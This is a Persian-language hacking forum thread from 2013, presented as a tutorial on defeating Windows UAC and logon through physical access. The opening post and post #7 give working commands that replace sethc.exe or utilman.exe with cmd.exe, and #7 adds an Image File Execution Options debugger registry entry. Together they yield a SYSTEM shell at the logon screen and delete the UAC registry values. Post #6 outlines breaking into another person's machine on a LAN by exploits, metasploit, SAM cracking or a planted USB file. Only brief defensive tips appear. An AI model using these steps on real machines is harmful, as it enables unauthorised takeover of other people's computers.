اطلاعیه

Collapse
No announcement yet.

آموزش شکستن uac ویندوز در دسترسی های فیزیکی

Collapse
X
 
  • Filter
  • زمان
  • Show
Clear All
new posts

  • آموزش شکستن uac ویندوز در دسترسی های فیزیکی

    سری مقالات و آموزش های امنیت سیستم عامل ویندوز ::::
    تو این آموزش می خوام طریقه ی شکستن پسورد UAC رو در دسترسی های فیزیکیبگم حتی اگه UAC دارای *ورد باشه

    برای این کار مراحل زیر رو باید انجام بدیم

    اول از همه با یک سیستم عامل دیگه بالا میایم

    بهترین کار استفاده از همون windows 7 , 8 و قابلیت repire کردن اون هست که میشه همونجا command prompt رو اجرا کرد

    اینجا آموزشش هست

    http://www.sevenforums.com/tutorials...t-startup.html

    وقتی به command prompt رسیدید باید مراحل زیرروانجام بدید

    کپی کردن یکی از فایل های زیر در شاخه ی اصلی ویندوز اونم به دلیلاینکه فایل از بین نره و پشتیبانی ازش داشته باشیم

    کد:
    Displayswitch.exe – sethc.exe –narrattor.exe – magnify.exe – OSK.exe - utilman.exe
    حالا باید فایل cmd.exe و یا regedit و یا taskmgr رو با این اسم کپی کنیم توهمین مسیر

    خوب از فرامین زیر استفاده میکنیم

    ترجیحا از فایل های SEThc و OSK استفاده کننیم بهتره مااینجا از SETHC استفاده میکنیم

    خوب اینجا میایم با فرمان زیر مراحل بالا رو انجام میدیم
    کد:
    copy C:\windows\system32\cmd.exec:\sethc.exe
    copy C:\windows\system32\cmd.exesethc.exe
    و yes رو میزینیم و تموم ویندوزرو Restart میکنیم و بعد با سیستم عامل اصلی میایم بالا

    حالا وقتی به welcomescreen میرسیم میایم shift رو 6 تا 10 با می زنیم اینقدر میزنیم تا cmd بالا بیاد
    و بعد این کار بعد از اجرای cmd میریم regedit رو اجرا میکنیم و به مسیر زیر میریم

    کد:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    تی این مسیر 2 مقدار زیر رو حذف میکنیم
    کد:
    EnableLUA
    ConsentPromptBehaviorAdmin
    و بعد وارد ویندوز میشیم و UAC غیر فعال میشه

    اصطلاحا UAC غیر فعال میشه

    می تونید بعد از رورود به ویندوز سطح دسترسی فایل SETHC که همون CMd هست اینجا بالا ببرید وفایل SETHC که داخل ریشه ی اصلی هست رو کپی کنید به جایاون
    Last edited by l4tr0d3ctism; 12-15-2013, 11:38 AM.
    ...

  • #2
    با تشکر از مسلم عزیز.

    راهی هست جلوی این چند بار شیفت زدن رو گرفت ؟
    تو بعضی از سیستم ها چند بار شیفت رو که میزنم بالا نمیاد ولی تو بعضیا دیگه مشکل نداره

    دلیلش چی میتونه باشه ؟

    Comment


    • #3
      بله میشه که تو control panel گزینه ی Ease of Access Center و بعد گزینه ی و بعد Make the keyboard easier to use و بعدشم Set up Sticky Keys رو انتخاب کنید

      اونجا گزینه ای هست که گفته turn on stiky key when shift SHIFT is pressed Five time تیکش رو برداری دیگه بالا نمیاد

      ولی همون طور که گفتم میشه که به جای SETHC از OSK و ... استفاده کرد

      اینجا توضیحات رو تو این کتاب نوشتم 2 سال پیش نوشتم فکر کنم

      http://www.shabgard.org/forums/showthread.php?25282

      برای جلوگیری از این نوع حملات بهترین کار اپدیت مادر بورد و قفل گزاری روی اون هست که کسی نتونه بوت کنه بیاد بالا

      ولی اگه کیس قفل باشه کسی نتونه کیس رو باز کنه و باتری رو خالی کنه خوب تو اپدیت های جدید من روشی برای شکستنش ندارم

      دوستان دیگه اگه دارن share کنن روش رو
      ...

      Comment


      • #4
        مسلم اقا اون حرکت ردیف کن گیرم :d

        Comment


        • #5
          ممنونم از آموزش خوبتون

          حالا که این مطرح کردین من هم یک سوال داشتم، کم و بیش در همین ضمینه اگر توی یک شبکه Local موقع windows discovery network یک کلاینت دیگه باشه و برای ورود به سیستم اون از شما نام کاربری و رمز عبور بخواد، برای دور زدن چیکار می شه کرد؟

          ممنون می شم در این مورد راهنمایی دقیق کنید.

          Comment


          • #6
            این چیزی که شما میگید در اصل بر میگرده به بحث Client hacking شاید کادر پسورد مثل هم باشه اما این UAC نیست

            شما اگه بخواید این رو بدست بیارید باید بتونید از طریق یک آسیب پذیری ( وارد جزئیات نمیشم ) به اون سیستم عامل نفوذ کنید و Administrator رو فعال و پسوردشو تغییر بدید

            و یا اینکه یک user دیگه بسازید و پسورد قرار بدید براش

            --------------

            حالا اگه دسترسی لوکال داشته باشید اون که راحته خودتون پسورد رو عوض کنید

            اگه نه نداشته باشید کمترینش اینه که خدا خدا کنید ویندوز قربانی اپدیت نباشه که شاید بتونید با ابزار ها و اسیب پذیری هایی ویندوز واردش بشید مثلا با metasploit و خودتون user بسازید و پسورد و یا تغییر بدید

            اگه بخوایید گیر بیارید اون رو بحث میره سراغ کرک فایل SAM و یا با بروت فورس بتونید اون رو بدست بیارید .

            کلا همین چیزایی هم که گفتم جای بحث خیلی زیاد داره

            بهترین کار اینه که شما یک فایل رو از طریق USB و یا هرچی به سیستم طرف وارد کنید که اون پسورد رو تغییر بده یا یک یوزر دیگه بسازه و بعد بیاید این ور و وارد سیستم بشید .

            این بحث شما خودش یک کتاب باید بزنیم در جوابش

            در هر صورت درسته که ویندوز کمی باگ داره ولی اینقدرام سوراخ نیست که راحت بشه هکش کرد
            ...

            Comment


            • #7
              صرفا جهت ...

              از فیها خالدون آرشیو با زبان شیرین انگلیسی ( به روش خودم ... )

              کد:
              [LEFT]I.T.N.O.G
              ---------
              : Privilege Escalation via "Sticky" Keys
              
              You can gain a SYSTEM shell on an application you have administrative access on  or if you have physical access to the box and can boot to repair disk or linux distro and can change files.
              We Can Use Sticky Keys With "Sethc.exe" Or "Utilman.exe"
              
              1) Make A Copy Somewhere Of The Original On System sethc.exe
              
                 : copy c:\windows\system32\sethc.exe c:\
                 : cp /mnt/sda3/Windows/System32/sethc.exe /mnt/sda3/sethc.exe
              
              2) Copy cmd.exe into Sethc.exe's place  (1)
              
                 : copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
                 : cp /mnt/sda3/Windows/System32/cmd.exe /mnt/sda3/Windows/System32/sethc.exe
              
              3) Reboot, hit Shift key 5 times, SYSTEM shell will pop up, do your thing ...
              
              *) Same goes for Utilman.exe 
                 Utilman.exe can be launched via Ctrl + U or the Accessibility button on Vista+'s logon screen.
              
              *) One thing about sticky keys in that some machines / users have disabled the Shift key five times 
                 keyboard shortut
                 
                 You can also use Left Alt + Left Shift + Print Screen to launch sethc.exe
               
              Finish ./
              
              ------------------------------------------------------
              (1)
              You can also achieve same results by setting executable of your choice as Debugger to sethc.exe under Image File Execution options in registry. So in a priv command shell, it would be
              
              REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
              [/LEFT]

              Comment


              • #8
                هر دو بحث درسته ولی هیچ کدوم منجرب به غیر فعال کردن UAc نمیشه

                باید بعد جایگزین کردن وارد مسیری که بالا گفتم بشیم و اون 2 مقدار رو حرف کنیم

                دومین هم که همون بحث زیره که کامل آسیب پذیری رو گفتیم

                http://www.shabgard.org/forums/showthread.php?28451

                هست که کامل در این پست که معرفی کردم گفتیم ولی این یکی نمی تونه UAC رو غیر فعال کنه اگه قبلش UAC فعال باشه

                ===========

                ممنون
                ...

                Comment

                Working...
                X